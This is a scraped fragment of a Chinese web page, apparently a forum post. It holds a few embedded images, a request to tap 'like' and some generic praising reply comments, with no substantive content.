<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb6OLwHohYU7UjX5anusw3ZzxxUKM0Ert9iaakSvib40glppuwsWytjDfiaFx1T25gsIWL5c8c7kicamxw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_gif/Ok4fxxCpBb5ZMeq0JBK8AOH3CVMApDrPvnibHjxDDT1mY2ic8ABv6zWUDq0VxcQ128rL7lxiaQrE1oTmjqInO89xA/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">觉得内容不错就点个<span style="color: black;">“在看”</span>吧!</strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb5szT2S0kia1SL3WaHGwfXtxH4ggWSHFk12SjbrDREfWSPVOibbaHID0CK1BcngJV2R9d0ia7df1ibJdQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
在遇到你之前,我对人世间是否有真正的圣人是怀疑的。 你的见解独到,让我受益匪浅,期待更多交流。 请问、你好、求解、谁知道等。 你的见解独到,让我受益匪浅,非常感谢。
页:
[1]